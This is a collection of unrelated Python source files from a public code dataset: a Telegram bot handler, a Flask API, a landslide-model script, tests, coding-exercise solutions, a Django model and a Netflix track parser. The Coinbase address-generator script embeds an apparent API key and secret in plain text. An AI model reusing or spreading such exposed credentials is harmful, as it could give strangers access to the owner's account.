Inheritable\n def reply_markup_handler(self, update):\n pass\n\n # Inheritable\n def on_keyboard_callback_query(self, update):\n pass\n\n @send_upload_photo_action\n def send_photo(self, *args, **kwargs):\n caption = kwargs['caption'] if kwargs.get('caption') else ''\n\n if len(caption) <= TG_MESSAGE_SIZE_LIMIT:\n return self.__chat.send_photo(*args, **kwargs)\n\n kwargs.pop('caption')\n\n subtext, other = get_divided_long_message(caption, TG_MESSAGE_SIZE_LIMIT)\n self.send_photo(*args, caption=subtext, **kwargs)\n\n kwargs.pop('text')\n\n return self.send_message(other, **kwargs)\n\n @send_typing_action\n def send_message(self, text, *args, **kwargs):\n # Check if enough time passed\n cur_time 
+{"seq_id":"32796109151","text":"import enum, time, logging\n\nimport telegram as tg\n\nfrom .message import Message\nfrom .command import Command\nfrom ..types import MESSAGE_TYPES\nfrom ..utils import send_action, get_commands_pretty_printed, is_admin, TG_MESSAGE_SIZE_LIMIT, get_divided_long_message, \\\n    ON_ERROR\n\n\nclass DialogState:\n    DEFAULT = 0\n\n\nclass BaseBotCommands(enum.Enum):\n    help = 'See my commands'\n    start = 'Hi, I am a bot'\n\n\nsend_typing_action = send_action(tg.ChatAction.TYPING)\nsend_upload_video_action = send_action(tg.ChatAction.UPLOAD_VIDEO)\nsend_upload_photo_action = send_action(tg.ChatAction.UPLOAD_PHOTO)\n\nMIN_TIME_BETWEEN_MESSAGES = 2\n\nclass ChatHandler:\n    ONLY_ADMINS_COMMANDS = []\n    KEYBOARD_AVAILABLE_TEXT = []\n    USER_NOT_ADMIN = \"Only admins can use this command\"\n\n    class CommandsEnum(enum.Enum):\n        pass\n\n    def __init__(self, chat: tg.Chat, bot: tg.Bot):\n        self.__chat = chat\n        self.id = chat.id\n        self.bot = bot\n        self.state = DialogState.DEFAULT\n\n        self.existing_commands_list = list(map(lambda x: x.name, list(BaseBotCommands.__iter__()))) + \\\n                                      list(map(lambda x: x.name, list(self.CommandsEnum.__iter__())))\n\n        self.last_sent_message_time = 0\n\n    def on_help(self):\n        res_dict = dict()\n\n        for i in self.CommandsEnum:\n            res_dict[i.name] = i.value[0]\n\n        mess_args = get_commands_pretty_printed(res_dict)\n        self.send_message(**mess_args)\n\n    def on_start(self):\n        self.on_help()\n\n    def reply(self, update: tg.Update, msg_type: MESSAGE_TYPES):\n        if update.edited_message:\n            return\n\n        if update.message.text in self.KEYBOARD_AVAILABLE_TEXT:\n            self.reply_markup_handler(update)\n            return\n\n        if msg_type == MESSAGE_TYPES.COMMAND:\n            command = Command(self, update)\n            logging.debug('%s : %s : %s : %s' %\n                          (command.user.name, command.chat_user.status, command.name, command.entity_text))\n\n            if command.name in self.ONLY_ADMINS_COMMANDS:\n                if not is_admin(command.chat_user.status):\n                    raise BotMessageException(self.USER_NOT_ADMIN)\n\n            if command.name == BaseBotCommands.help.name:\n                self.on_help()\n            elif command.name == BaseBotCommands.start.name:\n                self.on_start()\n            else:\n                self.__reply_command(update)\n\n    def __reply_command(self, update: tg.Update):\n        command = Command(self, update)\n\n        for enum_elem in self.CommandsEnum:\n            if enum_elem.name == command.name:\n                func = enum_elem.value[1]\n\n                if func:\n                    func(self, update)\n                else:\n                    # If func is None, call self.on_<command_name>()\n                    self.__getattribute__(f'on_{enum_elem.name}')(update)\n\n    def get_member(self, user_id) -> tg.ChatMember:\n        return self.__chat.get_member(user_id=user_id)\n\n    # Inheritable\n    def reply_markup_handler(self, update):\n        pass\n\n    # Inheritable\n    def on_keyboard_callback_query(self, update):\n        pass\n\n    @send_upload_photo_action\n    def send_photo(self, *args, **kwargs):\n        caption = kwargs['caption'] if kwargs.get('caption') else ''\n\n        if len(caption) <= TG_MESSAGE_SIZE_LIMIT:\n            return self.__chat.send_photo(*args, **kwargs)\n\n        kwargs.pop('caption')\n\n        subtext, other = get_divided_long_message(caption, TG_MESSAGE_SIZE_LIMIT)\n        self.send_photo(*args, caption=subtext, **kwargs)\n\n        return self.send_message(other, **kwargs)\n\n    @send_typing_action\n    def send_message(self, text, *args, **kwargs):\n        # Check if enough time passed\n        cur_time = time.time()\n        time_passed = cur_time - self.last_sent_message_time\n        time_to_sleep = round(MIN_TIME_BETWEEN_MESSAGES - time_passed, 1)\n\n        if time_to_sleep > 0:\n            logging.info(f'Wait {time_to_sleep}')\n            time.sleep(time_to_sleep)\n\n        self.last_sent_message_time = time.time()\n\n        if len(text) <= TG_MESSAGE_SIZE_LIMIT:\n            return self.__chat.send_message(text, *args, **kwargs)\n\n        subtext, other = get_divided_long_message(text, TG_MESSAGE_SIZE_LIMIT)\n        self.send_message(subtext, *args, **kwargs)\n        self.send_message(other, *args, **kwargs)\n\n    def send_alert(self, *args, **kwargs):\n        return self.bot.answer_callback_query(*args, show_alert=True, **kwargs)\n\n    @send_typing_action\n    def edit_message(self, *args, text=None, message=None, **kwargs):\n        if not text:\n            text = message.text\n        return self.__chat.bot.edit_message_text(*args,\n                                                 text=text,\n                                                 chat_id=self.__chat.id,\n                                                 message_id=message.message_id,\n                                                 **kwargs)\n\n    @send_typing_action\n    def delete_message(self, message, **kwargs):\n        success = self.__chat.bot.delete_message(chat_id=self.__chat.id, message_id=message.message_id, **kwargs)\n        if not success:\n            raise Exception(\"Unsuccessful message delete\")\n\n    @send_typing_action\n    def pin_chat_message(self, message, **kwargs):\n        self.__chat.bot.pin_chat_message(self.__chat.id, message.message_id, **kwargs)\n\n    def remove_keyboard(self, *args, **kwargs):\n        return self.send_message(*args, reply_markup=tg.ReplyKeyboardRemove(), **kwargs)\n\n\nclass BotMessageException(Exception):\n    def __init__(self, text, parse_mode=None):\n        super().__init__(text)\n        self.mess_kwargs = {'text': ON_ERROR(text), 'parse_mode': parse_mode}\n","repo_name":"tsepanx/tglib","sub_path":"classes/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"19051919993","text":"from flask import Flask\nfrom flask_restful import Resource, Api\nfrom lobbyist_query import search_issues\n\napp = Flask(__name__)\napi = Api(app)\n\n#52010DC2020\n\nclass CommentApi(Resource):\n    def get(self, celex):\n        result = search_issues(celex = celex)\n        return result\n\napi.add_resource(CommentApi, '/<celex>')\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', debug=True)","repo_name":"andrewgu12/The-10-Percent","sub_path":"comments_api.py","file_name":"comments_api.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
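# Aside on the record above: with the resource registered at '/<celex>',
# flask_restful passes the URL segment straight into get(self, celex). A minimal
# client sketch against a locally running app; host and port are assumptions,
# the CELEX id is the one from the record's own comment:
import requests
print(requests.get('http://localhost:5000/52010DC2020').json())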
+{"seq_id":"41098791465","text":"######################################################\r\n######################################################\r\n# Importing modules\r\n######################################################\r\n######################################################\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport json\r\nimport os\r\nimport rasterio\r\nfrom shapely import wkt\r\nimport geopandas as gpd\r\nfrom prediction_landslide_outputs import *\r\nfrom run_json import *\r\n\r\n############################################\r\n# Script with a function that runs everything needed to get the outputs from\r\n# the simulation. It will use the files created in get_closest_calib_point.py\r\n# The output is the timeseries with the Factor of Safety for each point\r\n# Marina Ruiz Sanchez-Oro\r\n# 10/12/2021\r\n############################################\r\nFILE_PATHS = read_paths_file()\r\nbool_lat_lon = FILE_PATHS[\"bool_lat_lon\"]\r\n#rundir = FILE_PATHS[\"rundir\"]\r\n# parameter files\r\n# the params used to define the physical soil properties in the Iverson MC runs\r\nIverson_MC_params_file = FILE_PATHS[\"iverson_param\"]\r\n\r\n# observed failure data files\r\n# don't need this anymore!\r\nfailfile = FILE_PATHS[\"ground_motion_failure\"]\r\n\r\n# topography files\r\ndemfile = FILE_PATHS[\"dem_file\"]\r\nslopefile = FILE_PATHS[\"slope_file\"]\r\nclosest_cal_points = FILE_PATHS[\"closest_cal_points\"]\r\npoints_in_buffer = FILE_PATHS[\"points_in_buffer\"]\r\nanomaly_failures = FILE_PATHS[\"anomaly_failures\"]\r\n\r\ndef landslide_output_from_rain(rainfall_file, rundir):\r\n    \"\"\"\r\n    landslide_output_from_rain runs the Iverson model on the test points given the rainfall timeseries. It finds the failures\r\n    and generates the output csv file with the factor of safety timeseries. \r\n    :param rainfall_file: csv file with the precipitation timeseries\r\n    :param rundir: directory where output files will be saved\r\n    \"\"\"\r\n    ##########################################################################\r\n    # 0. Load rasters into arrays for DEM, slope, failtimes and prefailtimes for a given failure threshold. Let's use 80mm/yr for now.\r\n    demarr, pixelWidth, (geotransform, inDs) = fn.ENVI_raster_binary_to_2d_array(demfile)\r\n    slopearr, pixelWidth, (geotransform, inDs) = fn.ENVI_raster_binary_to_2d_array(slopefile)\r\n    failarr, pixelWidth, (geotransform, inDs) = fn.ENVI_raster_binary_to_2d_array(failfile)\r\n\r\n    # select the point of interest from the raster files.\r\n    #'./test_closest_calibration_points.csv' - this is the new file instead of the one with the single point\r\n    calibrated_multiple_points_path = closest_cal_points\r\n    calibrated_multiple_point_params = pd.read_csv(calibrated_multiple_points_path, index_col=None)\r\n\r\n    lons = calibrated_multiple_point_params['lon_test'].to_list()\r\n    lats = calibrated_multiple_point_params['lat_test'].to_list()\r\n    ##########################################################################\r\n    # values of the corresponding points\r\n    demval_point = select_topo_data(demfile, lons, lats)\r\n    slopeval_point = select_topo_data(slopefile, lons, lats)\r\n    failval_point = select_topo_data(failfile, lons, lats)\r\n\r\n\r\n    print('Now we have all the points we need for our analysis.')\r\n    ##########################################################################\r\n    ############################################################\r\n\r\n    # Read the Iverson params\r\n    Iverson_MC_params = pd.read_csv(Iverson_MC_params_file)\r\n    depths = np.arange(Iverson_MC_params.at[0,'depth'], Iverson_MC_params.at[1,'depth'], 0.2)\r\n\r\n\r\n    ###################### RAINFALL DATA #######################\r\n    # We are assuming that the rainfall data is the same for all the points:\r\n    # the area of interest has a rough length of 30km, which is the resolution of the\r\n    # precipitation data we have.\r\n    rainfile = rainfall_file\r\n    #\"/exports/csce/datastore/geos/groups/LSDTopoData/FORESEE/Data/Calibration/2014-01-01_to_2019-12-31_Intensity.csv\"\r\n\r\n    rain = pd.read_csv(rainfile)\r\n\r\n    rainlist = [0]\r\n    for i in range(1,len(rain)):\r\n        rainlist.append(rainlist[-1]+ 
int(rain['duration_s'].iloc[i]))\r\n rain['time_s'] = rainlist\r\n rain['rainfall_mm'] = rain['duration_s']*rain['intensity_mm_sec']\r\n ############################################################\r\n #anomalies_list = comparison_with_anomalous_failure( anomalies_csv)\r\n lat_failures, lon_failures = find_lon_lat_failures(lats, lons, rain, depths,calibrated_multiple_point_params,demval_point,slopeval_point,failval_point,rundir)\r\n ###########################################################\r\n distance_between_points_file = points_in_buffer\r\n distance_between_points = pd.read_csv(distance_between_points_file, index_col=None)\r\n\r\n anomalous_failures_bool = comparison_with_anomalous_failure(lat_failures, lon_failures, anomaly_failures)\r\n ###########################################################\r\n get_output_csv(lat_failures, lon_failures, distance_between_points,anomalous_failures_bool, rundir)\r\n","repo_name":"LSDtopotools/lsdfailtools","sub_path":"automation/get_output_files.py","file_name":"get_output_files.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"74104892527","text":"from copy import deepcopy\nimport json\nimport pytest\nimport shutil\nimport yaml\nfrom pathlib import Path\n\nfrom dryresume.resume import create_resumes\n\nREPO_ROOT = Path(__file__).parent.parent\n\ndef is_in(to_search, search_for):\n return search_for in to_search\n\ndef is_removed(to_search, search_for):\n return not search_for in to_search\n\ntest_dict = {\n 'base': {\n 'readfile': 'samples/input/json/george_resume.json',\n 'expected': {\n 'George Costanza': is_in,\n 'gcostanza@frankandestelle.net': is_in,\n 'Architectural design': is_in\n }\n },\n 'child': {\n 'readfile': 'samples/input/json/george_resume_baseball.json',\n 'expected': {\n 'George Costanza': is_in,\n 'gcostanza@frankandestelle.net': is_removed,\n 'george@georgecostanza.com': is_in,\n 'Architectural design': is_removed,\n 'Sleeping under desk': is_in\n }\n },\n 'grandchild': {\n 'readfile': 'samples/input/json/george_resume_tv.json',\n 'expected': {\n 'George Costanza': is_in,\n 'Sleeping under desk': is_removed,\n 'Screenwriting': is_in\n }\n }\n}\nyaml_dict = {\n 'george_resume.yaml': deepcopy(test_dict['base']),\n 'george_resume_baseball.yaml': deepcopy(test_dict['child']),\n 'george_resume_tv.yaml': deepcopy(test_dict['grandchild'])\n}\n\n@pytest.fixture()\ndef json_files():\n return [REPO_ROOT / f['readfile'] for f in test_dict.values()]\n\n@pytest.fixture()\ndef yaml_files(json_files, tmp_path):\n result = []\n for json_path in json_files:\n file_ext_only = f\"{json_path.stem}.yaml\"\n yaml_dest_path = REPO_ROOT / \"build\" / f\"{json_path.stem}.html\"\n yaml_src_path = tmp_path / file_ext_only\n with json_path.open() as json_file:\n config = json.load(json_file)\n options = config['options']\n data = config.get('resume')\n options['output-html'] = str(yaml_dest_path)\n if 'parent-data' in options:\n options['parent-data'] = \\\n f\"{str(Path(options['parent-data']).stem)}.yaml\"\n with yaml_src_path.open('w+') as yaml_file:\n yaml.dump({'options': options, 'resume': data}, yaml_file)\n yaml_dict[file_ext_only]['readfile'] = yaml_src_path\n result.append(yaml_src_path)\n return result\n\n@pytest.fixture()\ndef load_jsons(json_files):\n return create_resumes(json_files)\n\n@pytest.fixture()\ndef load_yamls(yaml_files):\n return create_resumes(\n yaml_files, reader=lambda x : yaml.load(x, Loader = yaml.Loader))\n\nclass 
TestIntegrationBroad:\n    \"\"\"No test doubles---full integration.\n    \"\"\"\n    @pytest.fixture(scope='class', autouse=True)\n    def wipe_build_dir(self):\n        repo_build_dir = Path(__file__).parent / 'build'\n        if repo_build_dir.exists():\n            shutil.rmtree(repo_build_dir)\n    \n    @pytest.mark.parametrize(\"name\", test_dict)\n    def test_html(self, load_jsons, name):\n        for value, exp_func in test_dict[name]['expected'].items():\n            test_key = REPO_ROOT / test_dict[name]['readfile']\n            with load_jsons[test_key].html_target.open() as f:\n                html_string = f.read()\n            assert exp_func(html_string, value)\n\n    @pytest.mark.parametrize(\"name\", yaml_dict)\n    def test_html_from_yaml(self, load_yamls, name):\n        for value, exp_func in yaml_dict[name]['expected'].items():\n            test_key = yaml_dict[name]['readfile']\n            with load_yamls[test_key].html_target.open() as f:\n                html_string = f.read()\n            assert exp_func(html_string, value)\n","repo_name":"exvertus/dryresume","sub_path":"tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7577808476","text":"import os\n\ndef lonelyinteger(a):\n    # Write your code here\n    for number in a:\n        if a.count(number)==1:\n            return number\n\nif __name__ == '__main__':\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    n = int(input().strip())\n\n    a = list(map(int, input().rstrip().split()))\n\n    result = lonelyinteger(a)\n\n    fptr.write(str(result) + '\\n')\n\n    fptr.close()\n","repo_name":"kmb21/Hackerank","sub_path":"Python/Lonelyinteger.py","file_name":"Lonelyinteger.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"335464901","text":"from typing import List\n\nclass Solution:\n    def sortColors(self, nums: List[int]) -> None:\n        \"\"\"\n        Do not return anything, modify nums in-place instead.\n        \"\"\"\n        '''\n        red = list(\"0\" * (nums.count(0)))\n        white = list(\"1\" * (nums.count(1)))\n        blue = list(\"2\" * (nums.count(2)))\n        total = red + white + blue\n        total = [int(i) for i in total]\n        \n        for i in range(len(total)):\n            nums[i] = total[i]\n        return nums\n        '''\n        red = nums.count(0)\n        white = nums.count(1)\n        blue = nums.count(2)\n        total = red + white + blue\n        for i in range(total):\n            if red >0:\n                nums[i] = 0\n                red -=1\n            elif white > 0:\n                nums[i] = 1\n                white -=1\n            elif blue > 0:\n                nums[i] = 2\n                blue -=1","repo_name":"wendy-wej/Solved-Leetcode-Questions","sub_path":"0075-sort-colors/0075-sort-colors.py","file_name":"0075-sort-colors.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71538857965","text":"import allure\nfrom evenbet_app_test_pywinauto.utils import return_func_name, mouse_input\nfrom evenbet_app_test_pywinauto.pages.BasePage import BasePage\n\n\ndef test_logout_from_left_menu(app, screenshot_report):\n    \"\"\"In this test we try to open the left menu, choose the 'Logout' tab, click the 'Yes' button in the logout dialog,\n    and find the 'Login' button on the main page.\"\"\"\n    with allure.step(\"Initializing MyGamesPage.\"):\n        page = BasePage(app=app)\n        screenshot_report['window'] = app\n        screenshot_report['file_name'] = return_func_name()\n    with allure.step(\"Find left menu button.\"):\n        left_menu_button = page.find_left_menu_button()\n        assert left_menu_button, \"Left Menu button not found on main page.\"\n    with allure.step(\"Click left menu button and find left menu tabs.\"):\n        
left_menu_button.click_input()\n        left_menu_tabs = page.wait_for_left_menu_tabs(timeout=2)\n        assert left_menu_tabs, \"Left menu tabs not found.\"\n    with allure.step(\"Click 'Logout' (last) tab and wait for logout dialog with 'Yes' button.\"):\n        left_menu_tabs[-1].click_input()\n        logout_dialog_yes_btn = page.wait_for_logout_dialog_yes_button(timeout=2)\n        assert logout_dialog_yes_btn, \"Logout form with 'Yes' button didn't appear after click 'Logout' left menu tab.\"\n    with allure.step(\"Click 'Yes' button and wait for 'Login' button on main page.\"):\n        logout_dialog_yes_btn.click_input()\n        main_page_login_button = page.wait_for_main_page_login_button(timeout=5)\n        assert main_page_login_button, \"Main page 'Login' button didn't appear after click 'Yes' \" \\\n                                       \"button on logout dialog.\"\n        mouse_input(main_page_login_button)\n    screenshot_report['status'] = 'passed'\n","repo_name":"Dichmarck/evenbet_app_test_pywinauto","sub_path":"test_logout.py","file_name":"test_logout.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9469255078","text":"from coinbase.wallet.client import Client\nimport json\nimport time\napi_key = \"qllinMZsWKJxMbm1\"\nsecret_key = \"O8166FUvpXgZk5XowalRE8cP0tVXRWkT\"\n\n\ndef client_validation(key, secret):\n    client = Client(key, secret)\n    return client\n\n\ndef get_check_list(client):\n    account = client.get_account('BTC')\n    file = open('id.json', 'w')\n    json.dump(account, file)\n    file.close()\n    file_1 = open('id.json', 'r')\n    btc = json.load(file_1)\n    file_1.close()\n    checklist = [btc['id'], btc['currency'], btc['balance']['amount'], btc['primary'], btc['allow_withdrawals'],\n                 btc['native_balance']]\n\n    return checklist\n\n\ndef create_address(btc_id, client):\n    address = client.create_address(btc_id)\n    return address\n\n\ndef address_record(add):\n    file_a = open('addresses_record2.json', 'r')\n\n    record_list = json.load(file_a)\n    file_a.close()\n    record_list.append(add)\n    file_update = open('addresses_record2.json', 'w')\n    json.dump(record_list, file_update)\n    file_update.close()\n\n\ndef address_record_2(add):\n    file_b = open('addresses.json', 'r')\n    record_list = json.load(file_b)\n    file_b.close()\n    new_record = {'address': add[0], 'date_created': add[1]}\n    record_list.append(new_record)\n    file_update = open('addresses.json', 'w')\n    json.dump(record_list, file_update)\n    file_update.close()\n\n\ndef address_read(add):\n    file_c = open('address_parser.json', 'w')\n    json.dump(add, file_c)\n    file_c.close()\n    file_p = open('address_parser.json', 'r')\n    adrss = json.load(file_p)\n    file_p.close()\n    address = adrss['address']\n    date = adrss['created_at']\n    return [address, date]\n\n\ndef run():\n    time.sleep(1)\n    c_valid = client_validation(api_key, secret_key)\n    check_list = get_check_list(c_valid)\n    btc_address = create_address(check_list[0], c_valid)\n    main_address = address_read(btc_address)\n    address_record_2(main_address)\n    address_record(btc_address)\n    print('address')\n    return main_address[0]\n\n\n\n","repo_name":"bruteforcerxx/axemo-","sub_path":"COINBASE_ADDRESS_GENERATOR.py","file_name":"COINBASE_ADDRESS_GENERATOR.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15876270005","text":"import requests\nimport os\n# Import WebClient from Python SDK (github.com/slackapi/python-slack-sdk)\nfrom slack_sdk import WebClient\nfrom slack_sdk.errors import 
SlackApiError\n\nindexArray = ['1','2','3','4','5','6','7','8','9','10','11','12','13','14']\nisCorrect = False\n\ndef handler(pd: \"pipedream\"):\n # variables declared for use in next workflow\n global count\n global isCorrect\n global timeStamp\n user = pd.steps[\"trigger\"][\"event\"][\"user\"]\n timeStamp = pd.steps[\"trigger\"][\"event\"][\"thread_ts\"]\n text = pd.steps[\"trigger\"][\"event\"][\"text\"]\n \n #slack API token\n TOKEN = pd.inputs[\"slack\"][\"$auth\"][\"oauth_access_token\"]\n authorization = f'Bearer {TOKEN}'\n headers = {\"Authorization\": authorization}\n r = requests.get('https://slack.com/api/users.profile.get', headers=headers)\n \n for i in indexArray:\n if text == i:\n isCorrect = True\n break\n \n return text,isCorrect,user,timeStamp\n","repo_name":"Yuyichn01/SlackBot-1","sub_path":"pipedream_check_input_number.py","file_name":"pipedream_check_input_number.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"24556036599","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport json\nimport pymongo\nimport codecs\n# from datetime import date\nimport datetime\nfrom scrapy.exceptions import DropItem\nimport re\n\nclass KaolaPipeline(object):\n # save to mongo\n def __init__(self):\n self.con = pymongo.MongoClient('10.214.224.142',20000)\n self.db = self.con.onlineshop\n self.goods = self.db[\"kaolaGoods\"]\n self.update_time = datetime.datetime.utcnow()\n \n self.db_sina = self.con.Sina_Distributed\n self.brand = self.db_sina[\"brand_information\"]\n self.brand_info = {}\n for i in self.brand.find({},{\"brand_name\":1}):\n self.brand_info[ i['brand_name'].lower() ] = i['_id']\n\n def process_item(self, item, spider):\n brand_name = re.search('(\\w+)(-)?(\\w+)',item['brand_name']).group().lower()\n item['brand_id'] = self.brand_info[brand_name]\n if 'people_aimed' not in item:\n item['people_aimed'] = u\"\"\n if 'product_type' not in item:\n item['product_type'] = u\"\"\n item['data_sourse'] = u\"考拉\"\n # item['update_time'] = date.today().isoformat()\n item['update_time'] = self.update_time\n self.goods.insert( dict(item) )\n return item\n\n \n # save to data.json\n # def __init__(self):\n # self.file=codecs.open(\"data.json\",\"wb\",\"utf-8\")\n\n # def process_item(self, item, spider):\n # line = json.dumps( dict(item), ensure_ascii=False )+'\\n'\n # self.file.write(line)\n # return item\n","repo_name":"joffreZju/pycode","sub_path":"kaola/kaola/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"13052598606","text":"# -*- coding: utf-8 -*-\n\nimport datetime, json, logging, os, pprint\n\nfrom .lib.scorer import Scorer\nfrom django.conf import settings as project_settings\nfrom django.core import serializers\nfrom django.core.urlresolvers import reverse\nfrom django.db import models\nfrom django.http import HttpResponseRedirect\nfrom django.utils import timezone\n\n\nlog = logging.getLogger(__name__)\nscrr = Scorer()\n\n\nclass Tracker(models.Model):\n\n STANDARD_CHOICES = (\n ('yes', 'yes'), # ( db-value, appearance-value )\n ('no', 'no'),\n ('n/a', 'not-applicable'),\n )\n\n created = models.DateTimeField( auto_now_add=True )\n modified = models.DateTimeField( 
auto_now=True )\n\n # ================================================\n # will be publicly viewable\n # ================================================\n\n project_name = models.CharField( max_length=50 )\n slug = models.SlugField( help_text='for identifying segment in url; auto-entered, but feel free to edit' )\n project_contact_email = models.EmailField()\n\n code_versioned = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n\n has_public_code_url = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n public_code_url = models.URLField(\n max_length=200,\n blank=True\n )\n\n responsive = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text='looks/works right on desktop & mobile-devices'\n )\n\n contains_lightweight_data_reporting = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n\n accessibility_check_run = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n verbose_name='is accessible',\n help_text='start suggestion: no \"wave\" errors on first and second-level pages'\n )\n\n data_discoverable = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text='information accessible by discovery-application'\n )\n\n has_sitechecker_entry = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n\n # ================================================\n # everything below (to bottom of file) _not_ publicly viewable\n # ================================================\n\n ## dates for publicly viewable options\n\n project_contact_email_CHECKED = models.DateField( blank=True, null=True )\n\n code_versioned_CHECKED = models.DateField( blank=True, null=True )\n has_public_code_url_CHECKED = models.DateField(\n help_text=\"check-date for the drop-down menu for whether there _is_ a public url to code\",\n blank=True,\n null=True\n )\n public_code_url_CHECKED = models.DateField(\n help_text=\"check-date for the _accuracy_ of the public url entered\",\n blank=True,\n null=True\n )\n responsiveness_CHECKED = models.DateField( blank=True, null=True )\n contains_lightweight_data_reporting_CHECKED = models.DateField( blank=True, null=True )\n accessibility_check_run_CHECKED = models.DateField( blank=True, null=True )\n data_discoverable_CHECKED = models.DateField( blank=True, null=True )\n has_sitechecker_entry_CHECKED = models.DateField( blank=True, null=True )\n\n ##################################################\n ## security\n ##################################################\n\n framework_supported = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text='uses a supported long-term-release'\n )\n framework_supported_CHECKED = models.DateField( blank=True, null=True )\n\n https_enforced = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n https_enforced_CHECKED = models.DateField( blank=True, null=True )\n\n admin_links_shib_protected = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n admin_links_shib_protected_CHECKED = models.DateField( blank=True, null=True )\n\n logs_rotated = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n logs_rotated_CHECKED = models.DateField( blank=True, null=True )\n\n patron_data_expiration_process = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text='if patron data is 
captured, there is an implemented process for identifying info to be deleted'\n )\n patron_data_expiration_process_CHECKED = models.DateField( blank=True, null=True )\n\n django_session_data_expired = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text=\"if django session-data is stored in db, it's auto-deleted via cron\"\n )\n django_session_data_expired_CHECKED = models.DateField( blank=True, null=True )\n\n emails_admin_on_error = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text=\"\"\n )\n emails_admin_on_error_CHECKED = models.DateField( blank=True, null=True )\n\n vulnerabilities_fixed = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text=\"github `potential security vulnerabilities` fixed\"\n )\n vulnerabilities_fixed_CHECKED = models.DateField( blank=True, null=True )\n\n ### other ###\n\n notes = models.TextField( null=True, blank=True )\n\n score = models.IntegerField( null=True, blank=True, help_text=\"auto-calculated, not editable\" )\n\n def save(self, *args, **kwargs):\n self.score = scrr.calc_score( self )\n super(Tracker, self).save()\n\n def __unicode__(self):\n return self.project_name\n\n def jsonize( self ):\n jsn = serializers.serialize( 'json', self ) # data = serializers.serialize(\"json\", YourModel.objects.all())\n jsn_dct = json.loads( jsn )\n return jsn_dct\n\n\n ## end class Tracker()\n","repo_name":"Brown-University-Library/bul_cbp_project","sub_path":"bul_cbp_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8222531535","text":"import json\nclass NetFlixMessageProcessor():\n def __init__(self,data,track_info):\n self.data = data\n self.track_info = track_info\n\n def get_videoinfo_by_quality(self,quality,bitrate=0):\n result = self.track_info['result']\n video_track = result[\"video_tracks\"][0]\n streams = video_track[\"streams\"]\n\n filter_s = []\n for s in streams:\n if quality <= s['crop_h']:\n filter_s.append(s)\n if len(filter_s) == 0:\n filter_s.append(streams[-1])\n taget_s = filter_s[-1]\n for s in filter_s:\n if bitrate <= s['bitrate']:\n taget_s = s\n break\n\n return {\"url\":taget_s[\"urls\"][0][\"url\"],\n \"height\":taget_s[\"crop_h\"],\n \"width\":taget_s[\"crop_w\"],\n \"keyid\":taget_s[\"drmHeaderId\"],\n \"bitrate\":taget_s[\"bitrate\"]\n }\n\n def get_audioinfo_by_lan(self,lan=\"en\",languageDescription=\"\",channels=\"\"):\n result = self.track_info['result']\n audio_tracks = result[\"audio_tracks\"]\n target_a = audio_tracks[0]\n for audio in audio_tracks:\n if audio[\"language\"] == lan:\n target_a = audio\n if languageDescription == audio[\"languageDescription\"] and channels==audio[\"channels\"]:\n break\n height_s = target_a[\"streams\"][-1]\n return {\n \"url\": height_s[\"urls\"][0][\"url\"],\n \"language\":target_a[\"language\"],\n \"languageDescription\":target_a[\"languageDescription\"],\n \"channels\":target_a[\"channels\"],\n \"bitrate\": height_s[\"bitrate\"]\n }\n def get_subtitleinfo_by_lan(self,lan=\"en\",languageDescription=\"\"):\n result = self.track_info['result']\n timedtexttracks = result[\"timedtexttracks\"]\n target_s = timedtexttracks[0]\n for subtitle in timedtexttracks:\n if 